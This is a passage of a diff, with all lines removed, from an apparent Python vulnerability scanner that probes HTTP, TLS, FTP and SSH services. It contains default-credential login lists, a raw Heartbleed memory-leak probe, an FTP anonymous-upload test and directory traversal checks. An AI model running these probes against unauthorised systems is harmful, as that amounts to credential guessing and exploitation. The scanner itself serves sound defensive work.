- except Exception as e: - return probe_error(target, port, "HTTP-ALT", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_https(self, target, port): # default port: 443 - """ - Collect HTTPS response banner data for TLS services. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None, "server": None} - try: - url = f"https://{target}" - if port != 443: - url = f"https://{target}:{port}" - self.P(f"Fetching {url} for banner...") - ua = getattr(self, 'scanner_user_agent', '') - headers = {'User-Agent': ua} if ua else {} - resp = requests.get(url, timeout=3, verify=False, headers=headers) - raw["banner"] = f"HTTPS {resp.status_code} {resp.reason}" - raw["server"] = resp.headers.get("Server") - if raw["server"]: - _m = _HTTP_SERVER_RE.search(raw["server"]) - if _m: - _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _m.group(2)) - findings.append(Finding( - severity=Severity.INFO, - title=f"HTTPS service detected ({resp.status_code} {resp.reason})", - description=f"HTTPS service on {target}:{port}.", - evidence=f"Server: {raw['server'] or 'not disclosed'}", - confidence="certain", - )) - except Exception as e: - return probe_error(target, port, "HTTPS", e) - return probe_result(raw_data=raw, findings=findings) - - - # Default credentials for HTTP Basic Auth testing - _HTTP_BASIC_CREDS = [ - ("admin", "admin"), ("admin", "password"), ("admin", "1234"), - ("root", "root"), ("root", "password"), ("root", "toor"), - ("user", "user"), ("test", "test"), ("guest", "guest"), - ("admin", ""), ("tomcat", "tomcat"), ("manager", "manager"), - ] - - def _service_info_http_basic_auth(self, target, port): - """ - Test HTTP Basic Auth endpoints for default/weak credentials. 
- - Only runs when the target responds with 401 + WWW-Authenticate: Basic. - Tests a small set of default credential pairs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict or None - Structured findings, or None if no Basic Auth detected. - """ - findings = [] - raw = {"basic_auth_detected": False, "tested": 0, "accepted": []} - scheme = "https" if port in (443, 8443) else "http" - base_url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" - - # Probe / and /admin for 401 + Basic auth - auth_url = None - realm = None - for path in ("/", "/admin", "/manager"): - try: - resp = requests.get(base_url + path, timeout=3, verify=False) - if resp.status_code == 401: - www_auth = resp.headers.get("WWW-Authenticate", "") - if "Basic" in www_auth: - auth_url = base_url + path - realm_match = _re.search(r'realm="?([^"]*)"?', www_auth, _re.IGNORECASE) - realm = realm_match.group(1) if realm_match else "unknown" - break - except Exception: - continue - - if not auth_url: - return None # No Basic auth detected — skip entirely - - raw["basic_auth_detected"] = True - raw["realm"] = realm - - # Test credentials - consecutive_401 = 0 - for username, password in self._HTTP_BASIC_CREDS: - try: - resp = requests.get(auth_url, timeout=3, verify=False, auth=(username, password)) - raw["tested"] += 1 - - if resp.status_code == 429: - break # rate limited — stop - - if resp.status_code == 200 or resp.status_code == 301 or resp.status_code == 302: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"HTTP Basic Auth default credential: {cred_str}", - description=f"The web server at {auth_url} (realm: {realm}) accepted a default credential.", - evidence=f"GET {auth_url} with {cred_str} → HTTP {resp.status_code}", - remediation="Change default credentials 
immediately.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - elif resp.status_code == 401: - consecutive_401 += 1 - except Exception: - break - - # No rate limiting after all attempts - if consecutive_401 >= len(self._HTTP_BASIC_CREDS) - 1: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"HTTP Basic Auth has no rate limiting ({raw['tested']} attempts accepted)", - description="The server does not rate-limit failed authentication attempts.", - evidence=f"{consecutive_401} consecutive 401 responses without rate limiting.", - remediation="Implement account lockout or rate limiting for failed auth attempts.", - owasp_id="A07:2021", - cwe_id="CWE-307", - confidence="firm", - )) - - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_tls(self, target, port): - """ - Inspect TLS handshake, certificate chain, and cipher strength. - - Uses a two-pass approach: unverified connect (always gets protocol/cipher), - then verified connect (detects self-signed / chain issues). - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with protocol, cipher, cert details. 
- """ - findings = [] - raw = {"protocol": None, "cipher": None, "cert_subject": None, "cert_issuer": None} - - # Pass 1: Unverified — always get protocol/cipher - proto, cipher, cert_der = self._tls_unverified_connect(target, port) - if proto is None: - return probe_error(target, port, "TLS", Exception("unverified connect failed")) - - raw["protocol"], raw["cipher"] = proto, cipher - findings += self._tls_check_protocol(proto, cipher) - - # Pass 1b: SAN parsing and signature check from DER cert - if cert_der: - san_dns, san_ips = self._tls_parse_san_from_der(cert_der) - raw["san_dns"] = san_dns - raw["san_ips"] = san_ips - for ip_str in san_ips: - try: - import ipaddress as _ipaddress - if _ipaddress.ip_address(ip_str).is_private: - self._emit_metadata("internal_ips", {"ip": ip_str, "source": f"tls_san:{port}"}) - except (ValueError, TypeError): - pass - findings += self._tls_check_signature_algorithm(cert_der) - findings += self._tls_check_validity_period(cert_der) - - # Pass 2: Verified — detect self-signed / chain issues - findings += self._tls_check_certificate(target, port, raw) - - # Pass 3: Cert content checks (expiry, default CN) - findings += self._tls_check_expiry(raw) - findings += self._tls_check_default_cn(raw) - - # Pass 4: Heartbleed (CVE-2014-0160) - heartbleed = self._tls_check_heartbleed(target, port) - if heartbleed: - findings.append(heartbleed) - - # Pass 5: Downgrade attacks (POODLE / BEAST) - findings += self._tls_check_downgrade(target, port) - - if not findings: - findings.append(Finding(Severity.INFO, f"TLS {proto} {cipher}", "TLS configuration adequate.")) - - return probe_result(raw_data=raw, findings=findings) - - def _tls_unverified_connect(self, target, port): - """Unverified TLS connect to get protocol, cipher, and DER cert.""" - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - with socket.create_connection((target, port), timeout=3) as sock: - with 
ctx.wrap_socket(sock, server_hostname=target) as ssock: - proto = ssock.version() - cipher_info = ssock.cipher() - cipher_name = cipher_info[0] if cipher_info else "unknown" - cert_der = ssock.getpeercert(binary_form=True) - return proto, cipher_name, cert_der - except Exception as e: - self.P(f"TLS unverified connect failed on {target}:{port}: {e}", color='y') - return None, None, None - - def _tls_check_protocol(self, proto, cipher): - """Flag obsolete TLS/SSL protocols and weak ciphers.""" - findings = [] - if proto and proto.upper() in ("SSLV2", "SSLV3", "TLSV1", "TLSV1.1"): - findings.append(Finding( - severity=Severity.HIGH, - title=f"Obsolete TLS protocol: {proto}", - description=f"Server negotiated {proto} with cipher {cipher}. " - f"SSLv2/v3 and TLS 1.0/1.1 are deprecated and vulnerable.", - evidence=f"protocol={proto}, cipher={cipher}", - remediation="Disable SSLv2/v3/TLS 1.0/1.1 and require TLS 1.2+.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - if cipher and any(w in cipher.lower() for w in ("rc4", "des", "null", "export")): - findings.append(Finding( - severity=Severity.HIGH, - title=f"Weak TLS cipher: {cipher}", - description=f"Cipher {cipher} is considered cryptographically weak.", - evidence=f"cipher={cipher}", - remediation="Disable weak ciphers (RC4, DES, NULL, EXPORT).", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - return findings - - def _tls_check_certificate(self, target, port, raw): - """Verified TLS pass — detect self-signed, untrusted issuer, hostname mismatch.""" - findings = [] - try: - ctx = ssl.create_default_context() - with socket.create_connection((target, port), timeout=3) as sock: - with ctx.wrap_socket(sock, server_hostname=target) as ssock: - cert = ssock.getpeercert() - subj = dict(x[0] for x in cert.get("subject", ())) - issuer = dict(x[0] for x in cert.get("issuer", ())) - raw["cert_subject"] = subj.get("commonName") - raw["cert_issuer"] = 
issuer.get("organizationName") or issuer.get("commonName") - raw["cert_not_after"] = cert.get("notAfter") - except ssl.SSLCertVerificationError as e: - err_msg = str(e).lower() - if "self-signed" in err_msg or "self signed" in err_msg: - findings.append(Finding( - severity=Severity.MEDIUM, - title="Self-signed TLS certificate", - description="The server presents a self-signed certificate that browsers will reject.", - evidence=str(e), - remediation="Replace with a certificate from a trusted CA.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="certain", - )) - elif "hostname mismatch" in err_msg: - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS certificate hostname mismatch", - description=f"Certificate CN/SAN does not match {target}.", - evidence=str(e), - remediation="Ensure the certificate covers the served hostname.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="certain", - )) - else: - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS certificate validation failed", - description="Certificate chain could not be verified.", - evidence=str(e), - remediation="Use a certificate from a trusted CA with a valid chain.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="firm", - )) - except Exception: - pass # Non-cert errors (connection reset, etc.) 
— skip - return findings - - def _tls_check_expiry(self, raw): - """Check certificate expiry from raw dict.""" - findings = [] - expires = raw.get("cert_not_after") - if not expires: - return findings - try: - exp = datetime.strptime(expires, "%b %d %H:%M:%S %Y %Z") - days = (exp - datetime.utcnow()).days - raw["cert_days_remaining"] = days - if days < 0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"TLS certificate expired ({-days} days ago)", - description="The certificate has already expired.", - evidence=f"notAfter={expires}", - remediation="Renew the certificate immediately.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - elif days <= 30: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate expiring soon ({days} days)", - description=f"Certificate expires in {days} days.", - evidence=f"notAfter={expires}", - remediation="Renew the certificate before expiry.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - except Exception: - pass - return findings - - def _tls_check_default_cn(self, raw): - """Flag placeholder common names.""" - findings = [] - cn = raw.get("cert_subject") - if not cn: - return findings - cn_lower = cn.lower() - placeholders = ("example.com", "localhost", "internet widgits", "test", "changeme", "my company", "acme", "default") - if any(p in cn_lower for p in placeholders) or len(cn.strip()) <= 1: - findings.append(Finding( - severity=Severity.LOW, - title=f"TLS certificate placeholder CN: {cn}", - description="Certificate uses a default/placeholder common name.", - evidence=f"CN={cn}", - remediation="Replace with a certificate bearing the correct hostname.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="firm", - )) - return findings - - def _tls_parse_san_from_der(self, cert_der): - """Parse SAN DNS names and IP addresses from a DER-encoded certificate.""" - dns_names, ip_addresses = [], [] - if not cert_der: - return dns_names, 
ip_addresses - try: - from cryptography import x509 - cert = x509.load_der_x509_certificate(cert_der) - try: - san_ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName) - dns_names = san_ext.value.get_values_for_type(x509.DNSName) - ip_addresses = [str(ip) for ip in san_ext.value.get_values_for_type(x509.IPAddress)] - except x509.ExtensionNotFound: - pass - except Exception: - pass - return dns_names, ip_addresses - - def _tls_check_signature_algorithm(self, cert_der): - """Flag SHA-1 or MD5 signature algorithms.""" - findings = [] - if not cert_der: - return findings - try: - from cryptography import x509 - from cryptography.hazmat.primitives import hashes - cert = x509.load_der_x509_certificate(cert_der) - algo = cert.signature_hash_algorithm - if algo and isinstance(algo, (hashes.SHA1, hashes.MD5)): - algo_name = algo.name.upper() - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate signed with weak algorithm: {algo_name}", - description=f"The certificate uses {algo_name} for its signature, which is cryptographically weak.", - evidence=f"signature_algorithm={algo_name}", - remediation="Replace with a certificate using SHA-256 or stronger.", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - except Exception: - pass - return findings - - def _tls_check_validity_period(self, cert_der): - """Flag certificates with a total validity span >5 years (CA/Browser Forum violation).""" - findings = [] - if not cert_der: - return findings - try: - from cryptography import x509 - cert = x509.load_der_x509_certificate(cert_der) - span = cert.not_valid_after_utc - cert.not_valid_before_utc - if span.days > 5 * 365: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate validity span exceeds 5 years ({span.days} days)", - description="Certificates valid for more than 5 years violate CA/Browser Forum baseline requirements.", - evidence=f"not_before={cert.not_valid_before_utc}, 
not_after={cert.not_valid_after_utc}, span={span.days}d", - remediation="Reissue with a validity period of 398 days or less.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - except Exception: - pass - return findings - - - def _tls_check_heartbleed(self, target, port): - """Test for Heartbleed (CVE-2014-0160) by sending a malformed TLS heartbeat. - - Builds a raw TLS connection, completes handshake, then sends a heartbeat - request with payload_length > actual payload. If the server responds with - more data than sent, it is leaking memory. - - Returns - ------- - Finding or None - CRITICAL finding if vulnerable, None otherwise. - """ - try: - # Connect and perform TLS handshake via ssl module - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - # Allow older protocols for compatibility with vulnerable servers - ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED - - raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - raw_sock.settimeout(3) - raw_sock.connect((target, port)) - tls_sock = ctx.wrap_socket(raw_sock, server_hostname=target) - - # Get the negotiated TLS version for the heartbeat record - tls_version = tls_sock.version() - version_map = { - "TLSv1": b"\x03\x01", "TLSv1.1": b"\x03\x02", - "TLSv1.2": b"\x03\x03", "TLSv1.3": b"\x03\x03", - "SSLv3": b"\x03\x00", - } - tls_ver_bytes = version_map.get(tls_version, b"\x03\x01") - - # Build heartbeat request (ContentType=24, HeartbeatMessageType=1=request) - # payload_length is set to 16384 but actual payload is only 1 byte - # This is the essence of the Heartbleed attack: asking for more data than sent - hb_payload = b"\x01" # 1 byte actual payload - hb_msg = ( - b"\x01" # HeartbeatMessageType: request - + b"\x40\x00" # payload_length: 16384 (0x4000) - + hb_payload # actual payload: 1 byte - + b"\x00" * 16 # padding (16 bytes) - ) - - # TLS record: ContentType=24 (Heartbeat), version, length - tls_record = ( - 
b"\x18" # ContentType: Heartbeat - + tls_ver_bytes # TLS version - + struct.pack(">H", len(hb_msg)) - + hb_msg - ) - - # Send via the underlying raw socket (bypassing ssl module) - # We need to access the raw socket after handshake - # The ssl wrapper doesn't let us send raw records, so use raw_sock. - # After wrap_socket, raw_sock is consumed. Instead, use tls_sock.unwrap() - # to get the raw socket back. - try: - raw_after = tls_sock.unwrap() - raw_after.sendall(tls_record) - raw_after.settimeout(3) - response = raw_after.recv(65536) - raw_after.close() - except (ssl.SSLError, OSError): - # If unwrap fails, try closing and testing with a new raw connection - tls_sock.close() - return self._tls_heartbleed_raw(target, port, tls_ver_bytes) - - if response and len(response) >= 7: - # Check if response is a heartbeat response (ContentType=24) - if response[0] == 24: - resp_len = struct.unpack(">H", response[3:5])[0] - # If server sent back more than we sent (3 bytes of heartbeat msg), - # it leaked memory - if resp_len > len(hb_msg): - return Finding( - severity=Severity.CRITICAL, - title="TLS Heartbleed vulnerability (CVE-2014-0160)", - description=f"Server at {target}:{port} is vulnerable to Heartbleed. " - "An attacker can read up to 64KB of server memory per request, " - "potentially exposing private keys, session tokens, and passwords.", - evidence=f"Heartbeat response size ({resp_len} bytes) > request payload size ({len(hb_msg)} bytes). 
" - f"Leaked {resp_len - len(hb_msg)} bytes of server memory.", - remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", - owasp_id="A06:2021", - cwe_id="CWE-126", - confidence="certain", - ) - # TLS Alert (ContentType=21) = not vulnerable (server rejected heartbeat) - elif response[0] == 21: - return None - - except Exception: - pass - return None - - def _tls_heartbleed_raw(self, target, port, tls_ver_bytes): - """Fallback Heartbleed test using a raw TLS ClientHello with heartbeat extension. - - This is needed when ssl.unwrap() fails. We build a minimal TLS 1.0 - ClientHello that advertises the heartbeat extension, complete the handshake, - and then send the malformed heartbeat. - - Returns - ------- - Finding or None - """ - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - - # Minimal TLS 1.0 ClientHello with heartbeat extension - # This is a simplified approach: we use struct to build the exact bytes - hello = bytearray() - # Handshake header: ClientHello (0x01) - # Random: 32 bytes - client_random = random.randbytes(32) - # Session ID: 0 bytes - # Cipher suites: a few common ones - ciphers = ( - b"\x00\x2f" # TLS_RSA_WITH_AES_128_CBC_SHA - b"\x00\x35" # TLS_RSA_WITH_AES_256_CBC_SHA - b"\x00\x0a" # TLS_RSA_WITH_3DES_EDE_CBC_SHA - ) - # Compression: null only - compression = b"\x01\x00" - # Extensions: heartbeat (type 0x000f, length 1, mode=1 peer allowed to send) - heartbeat_ext = struct.pack(">HH", 0x000f, 1) + b"\x01" - extensions = heartbeat_ext - - client_hello_body = ( - b"\x03\x01" # TLS 1.0 - + client_random - + b"\x00" # Session ID length: 0 - + struct.pack(">H", len(ciphers)) + ciphers - + compression - + struct.pack(">H", len(extensions)) + extensions - ) - - # Handshake message: type=1 (ClientHello), length - handshake = b"\x01" + struct.pack(">I", len(client_hello_body))[1:] + client_hello_body - - # TLS record: ContentType=22 
(Handshake), version=TLS 1.0 - tls_record = b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake - sock.sendall(tls_record) - - # Read ServerHello + Certificate + ServerHelloDone - # We just need to consume enough to complete the handshake - server_response = b"" - for _ in range(10): - try: - chunk = sock.recv(16384) - if not chunk: - break - server_response += chunk - # Check if we received ServerHelloDone (handshake type 0x0e) - if b"\x0e\x00\x00\x00" in server_response: - break - except (socket.timeout, OSError): - break - - if not server_response: - sock.close() - return None - - # Now send the malformed heartbeat - hb_msg = b"\x01\x40\x00" + b"\x41" + b"\x00" * 16 # type=request, length=16384, 1 byte payload + padding - hb_record = b"\x18\x03\x01" + struct.pack(">H", len(hb_msg)) + hb_msg - sock.sendall(hb_record) - - # Read response - sock.settimeout(3) - try: - response = sock.recv(65536) - except (socket.timeout, OSError): - response = b"" - sock.close() - - if response and len(response) >= 7 and response[0] == 24: - resp_payload_len = struct.unpack(">H", response[3:5])[0] - if resp_payload_len > len(hb_msg): - return Finding( - severity=Severity.CRITICAL, - title="TLS Heartbleed vulnerability (CVE-2014-0160)", - description=f"Server at {target}:{port} is vulnerable to Heartbleed. " - "An attacker can read up to 64KB of server memory per request, " - "potentially exposing private keys, session tokens, and passwords.", - evidence=f"Heartbeat response ({resp_payload_len} bytes) exceeded request size.", - remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", - owasp_id="A06:2021", - cwe_id="CWE-126", - confidence="certain", - ) - except Exception: - pass - return None - - def _tls_check_downgrade(self, target, port): - """Test for TLS downgrade vulnerabilities (POODLE, BEAST). - - Returns list of findings. 
- """ - findings = [] - - # --- POODLE: Test SSLv3 acceptance --- - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - ctx.maximum_version = ssl.TLSVersion.SSLv3 - ctx.minimum_version = ssl.TLSVersion.SSLv3 - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - tls_sock = ctx.wrap_socket(sock, server_hostname=target) - negotiated = tls_sock.version() - tls_sock.close() - if negotiated and "SSL" in negotiated: - findings.append(Finding( - severity=Severity.HIGH, - title="Server accepts SSLv3 — vulnerable to POODLE (CVE-2014-3566)", - description=f"TLS on {target}:{port} accepts SSLv3 connections. " - "The POODLE attack allows decrypting SSLv3 traffic using CBC cipher padding oracles.", - evidence=f"Negotiated {negotiated} when SSLv3 was forced.", - remediation="Disable SSLv3 entirely on the server.", - owasp_id="A02:2021", - cwe_id="CWE-757", - confidence="certain", - )) - except (ssl.SSLError, OSError): - pass # SSLv3 rejected or not available in runtime — good - - # --- BEAST: Test TLS 1.0 with CBC cipher --- - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - ctx.maximum_version = ssl.TLSVersion.TLSv1 - ctx.minimum_version = ssl.TLSVersion.TLSv1 - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - tls_sock = ctx.wrap_socket(sock, server_hostname=target) - negotiated = tls_sock.version() - cipher_info = tls_sock.cipher() - tls_sock.close() - if negotiated and cipher_info: - cipher_name = cipher_info[0] if cipher_info else "" - if "CBC" in cipher_name.upper(): - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS 1.0 with CBC cipher — BEAST risk (CVE-2011-3389)", - description=f"TLS on {target}:{port} accepts TLS 1.0 with CBC-mode cipher '{cipher_name}'. 
" - "The BEAST attack exploits predictable IVs in TLS 1.0 CBC mode.", - evidence=f"Negotiated {negotiated} with cipher {cipher_name}.", - remediation="Disable TLS 1.0 or ensure only non-CBC ciphers are used with TLS 1.0.", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - except (ssl.SSLError, OSError): - pass # TLS 1.0 rejected — good - - return findings - - def _service_info_ftp(self, target, port): # default port: 21 - """ - Assess FTP service security: banner, anonymous access, default creds, - server fingerprint, TLS support, write access, and credential validation. - - Checks performed (in order): - - 1. Banner grab and SYST/FEAT fingerprint. - 2. Anonymous login attempt. - 3. Write access test (STOR) after anonymous login. - 4. Directory listing and traversal. - 5. TLS support check (AUTH TLS). - 6. Default credential check. - 7. Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with banner, vulnerabilities, server_info, etc. - """ - findings = [] - result = { - "banner": None, - "server_type": None, - "features": [], - "anonymous_access": False, - "write_access": False, - "tls_supported": False, - "accepted_credentials": [], - "directory_listing": None, - } - - def _ftp_connect(user=None, passwd=None): - """Open a fresh FTP connection and optionally login.""" - ftp = ftplib.FTP(timeout=5) - ftp.connect(target, port, timeout=5) - if user is not None: - ftp.login(user, passwd or "") - return ftp - - # --- 1. 
Banner grab --- - try: - ftp = _ftp_connect() - result["banner"] = ftp.getwelcome() - except Exception as e: - return probe_error(target, port, "FTP", e) - - # FTP server version CVE check - _ftp_m = _re.search( - r'(ProFTPD|vsftpd)[/ ]+(\d+(?:\.\d+)+)', - result["banner"], _re.IGNORECASE, - ) - if _ftp_m: - _cve_product = {'proftpd': 'proftpd', 'vsftpd': 'vsftpd'}.get(_ftp_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _ftp_m.group(2)) - - # --- 2. Anonymous login --- - try: - resp = ftp.login() - result["anonymous_access"] = True - findings.append(Finding( - severity=Severity.HIGH, - title="FTP allows anonymous login.", - description="The FTP server permits unauthenticated access via anonymous login.", - evidence="Anonymous login succeeded.", - remediation="Disable anonymous FTP access unless explicitly required.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - except Exception: - # Anonymous failed — close and move on to credential tests - try: - ftp.quit() - except Exception: - pass - ftp = None - - # --- 2b. SYST / FEAT (after login — some servers require auth first) --- - if ftp: - try: - syst = ftp.sendcmd("SYST") - result["server_type"] = syst - except Exception: - pass - - try: - feat_resp = ftp.sendcmd("FEAT") - feats = [ - line.strip() for line in feat_resp.split("\n") - if line.strip() and not line.startswith("211") - ] - result["features"] = feats - except Exception: - pass - - # --- 2c. 
PASV IP leak check --- - if ftp and result["anonymous_access"]: - try: - pasv_resp = ftp.sendcmd("PASV") - _pasv_match = _re.search(r'\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)', pasv_resp) - if _pasv_match: - pasv_ip = f"{_pasv_match.group(1)}.{_pasv_match.group(2)}.{_pasv_match.group(3)}.{_pasv_match.group(4)}" - if pasv_ip != target: - import ipaddress as _ipaddress - try: - if _ipaddress.ip_address(pasv_ip).is_private: - result["pasv_ip"] = pasv_ip - self._emit_metadata("internal_ips", {"ip": pasv_ip, "source": f"ftp_pasv:{port}"}) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"FTP PASV leaks internal IP: {pasv_ip}", - description=f"PASV response reveals RFC1918 address {pasv_ip}, different from target {target}.", - evidence=f"PASV response: {pasv_resp}", - remediation="Configure FTP passive address masquerading to use the public IP.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - except (ValueError, TypeError): - pass - except Exception: - pass - - # --- 3. Write access test (only if anonymous login succeeded) --- - if ftp and result["anonymous_access"]: - import io - try: - ftp.set_pasv(True) - test_data = io.BytesIO(b"RedMesh write access probe") - resp = ftp.storbinary("STOR __redmesh_probe.txt", test_data) - if resp and resp.startswith("226"): - result["write_access"] = True - findings.append(Finding( - severity=Severity.CRITICAL, - title="FTP anonymous write access enabled (file upload possible).", - description="Anonymous users can upload files to the FTP server.", - evidence="STOR command succeeded with anonymous session.", - remediation="Remove write permissions for anonymous FTP users.", - owasp_id="A01:2021", - cwe_id="CWE-434", - confidence="certain", - )) - try: - ftp.delete("__redmesh_probe.txt") - except Exception: - pass - except Exception: - pass - - # --- 4. 
Directory listing and traversal --- - if ftp: - try: - pwd = ftp.pwd() - files = [] - try: - ftp.retrlines("LIST", files.append) - except Exception: - pass - if files: - result["directory_listing"] = files[:20] - except Exception: - pass - - # Check if CWD allows directory traversal - for test_dir in ["/etc", "/var", ".."]: - try: - resp = ftp.cwd(test_dir) - if resp and (resp.startswith("250") or resp.startswith("200")): - findings.append(Finding( - severity=Severity.HIGH, - title=f"FTP directory traversal: CWD to '{test_dir}' succeeded.", - description="The FTP server allows changing to directories outside the intended root.", - evidence=f"CWD '{test_dir}' returned: {resp}", - remediation="Restrict FTP users to their home directory (chroot).", - owasp_id="A01:2021", - cwe_id="CWE-22", - confidence="certain", - )) - break - except Exception: - pass - try: - ftp.cwd("/") - except Exception: - pass - - if ftp: - try: - ftp.quit() - except Exception: - pass - - # --- 5. TLS support check --- - try: - ftp_tls = _ftp_connect() - resp = ftp_tls.sendcmd("AUTH TLS") - if resp.startswith("234"): - result["tls_supported"] = True - try: - ftp_tls.quit() - except Exception: - pass - except Exception: - if not result["tls_supported"]: - findings.append(Finding( - severity=Severity.MEDIUM, - title="FTP does not support TLS encryption (cleartext credentials).", - description="Credentials and data are transmitted in cleartext over the network.", - evidence="AUTH TLS command rejected or not supported.", - remediation="Enable FTPS (AUTH TLS) or migrate to SFTP.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 6. 
Default credential check --- - for user, passwd in _FTP_DEFAULT_CREDS: - try: - ftp_cred = _ftp_connect(user, passwd) - result["accepted_credentials"].append(f"{user}:{passwd}") - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"FTP default credential accepted: {user}:{passwd}", - description="The FTP server accepted a well-known default credential.", - evidence=f"Accepted credential: {user}:{passwd}", - remediation="Change default passwords and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - try: - ftp_cred.quit() - except Exception: - pass - except (ftplib.error_perm, ftplib.error_reply): - pass - except Exception: - pass - - # --- 7. Arbitrary credential acceptance test --- - import string as _string - ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) - rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) - try: - ftp_rand = _ftp_connect(ruser, rpass) - findings.append(Finding( - severity=Severity.CRITICAL, - title="FTP accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {ruser}:{rpass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - try: - ftp_rand.quit() - except Exception: - pass - except (ftplib.error_perm, ftplib.error_reply): - pass - except Exception: - pass - - return probe_result(raw_data=result, findings=findings) - - def _service_info_ssh(self, target, port): # default port: 22 - """ - Assess SSH service security: banner, auth methods, and default credentials. - - Checks performed (in order): - - 1. Banner grab — fingerprint server version. - 2. Auth method enumeration — identify if password auth is enabled. - 3. Default credential check — try a small list of common creds. - 4. 
Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with banner, auth_methods, and vulnerabilities. - """ - findings = [] - result = { - "banner": None, - "auth_methods": [], - } - - # --- 1. Banner grab (raw socket) --- - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - banner = sock.recv(1024).decode("utf-8", errors="ignore").strip() - sock.close() - result["banner"] = banner - # Emit OS claim from SSH banner (e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu") - _os_match = _re.search(r'(Ubuntu|Debian|Fedora|CentOS|Alpine|FreeBSD)', banner, _re.IGNORECASE) - if _os_match: - self._emit_metadata("os_claims", f"ssh:{port}", _os_match.group(1)) - except Exception as e: - return probe_error(target, port, "SSH", e) - - # --- 2. Auth method enumeration via paramiko Transport --- - try: - transport = paramiko.Transport((target, port)) - transport.connect() - try: - transport.auth_none("") - except paramiko.BadAuthenticationType as e: - result["auth_methods"] = list(e.allowed_types) - except paramiko.AuthenticationException: - result["auth_methods"] = ["unknown"] - finally: - transport.close() - except Exception as e: - self.P(f"SSH auth enumeration failed on {target}:{port}: {e}", color='y') - - if "password" in result["auth_methods"]: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SSH password authentication is enabled (prefer key-based auth).", - description="The SSH server allows password-based login, which is susceptible to brute-force attacks.", - evidence=f"Auth methods: {', '.join(result['auth_methods'])}", - remediation="Disable PasswordAuthentication in sshd_config and use key-based auth.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - - # --- 3. 
